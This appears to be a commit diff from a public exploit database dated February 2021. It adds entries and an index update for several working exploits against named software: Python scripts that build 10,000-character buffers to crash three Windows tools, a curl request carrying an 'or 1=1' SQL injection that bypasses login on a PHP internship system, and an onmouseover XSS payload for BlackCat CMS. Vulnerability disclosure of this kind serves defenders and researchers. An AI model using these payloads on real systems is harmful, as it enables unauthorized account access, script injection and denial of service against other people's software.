DB: 2021-02-17

6 changes to exploits/shellcodes

Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)

exploits/php/webapps/49469.txt

@@ -4,6 +4,7 @@
 # Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
 # Version: 1
 # Tested on Windows
+# CVE: CVE-2021-3294
 
 *XSS IMPACT:*
 1: Steal the cookie

exploits/php/webapps/49564.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
+# Date: 16-02-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+
+# --- Description --- #
+
+The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. 
+
+# --- Proof of concept --- #
+
+Curl request for authentication bypass via sql injection in parameter 'email':
+
+curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="

exploits/php/webapps/49565.txt

@@ -0,0 +1,13 @@
+# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
+# Date: 16-02-2021
+# Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited
+# Vendor Homepage: https://blackcat-cms.org/
+# Software Link: https://blackcat-cms.org/page/download.php
+# Version: BlackCat CMS - 1.3.6
+# Tested on: Windows
+
+# Steps to Reproduce:
+
+1. To exploit this vulnerability an attacker has a login in the admin panel and clicks on the admin profile button. Then use " onmouseover=alert(1) " this XSS payload on Display name field and click on the Save button.
+
+2 .Then refresh the page and hover the mouse on Display name filed and our XSS message pop up.

exploits/windows/dos/49566.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://switchportmapper.com/
+# Software Link: https://switchportmapper.com/download.htm
+# Version: 2.85.2
+# Tested on: Windows 10 Home x64
+
+
+#STEPS
+# Open the program Managed Switch Port Mapping Tool
+# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Gou.txt"
+# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name 
+# Click in OK
+# End :)
+
+
+buffer = 'F' * 10000
+
+try: 
+    file = open("Gou2.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")

exploits/windows/dos/49567.txt

@@ -0,0 +1,27 @@
+# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://agatasoft.com/
+# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
+# Version: 2.1
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program AgataSoft PingMaster Pro
+# In Tools select the option Trace Route
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Gou.txt"
+# Paste the content in the field Host name and click in Get IP from host name
+# End :)
+
+
+buffer = 'S' * 10000
+
+try: 
+    file = open("Gou.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")

exploits/windows/dos/49568.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.2.0
+# Tested on: Windows 10 Home x64
+
+
+#STEPS
+# Open the program Nsauditor
+# In Options select Configuration...
+# Click in Security Events 
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Liella.txt"
+# Paste the content in the field Event Description and click in Add Event
+# End :)
+
+
+buffer = 'U' * 10000
+
+try: 
+    file = open("Liella.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")

files_exploits.csv

@@ -6768,6 +6768,9 @@ id,file,description,date,author,type,platform,port
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows,
 49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",2021-01-28,"Rafael Cintra Lopes",dos,multiple,
+49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
+49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
+49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -43752,3 +43755,5 @@ id,file,description,date,author,type,platform,port
 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,
 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,
+49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,
+49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,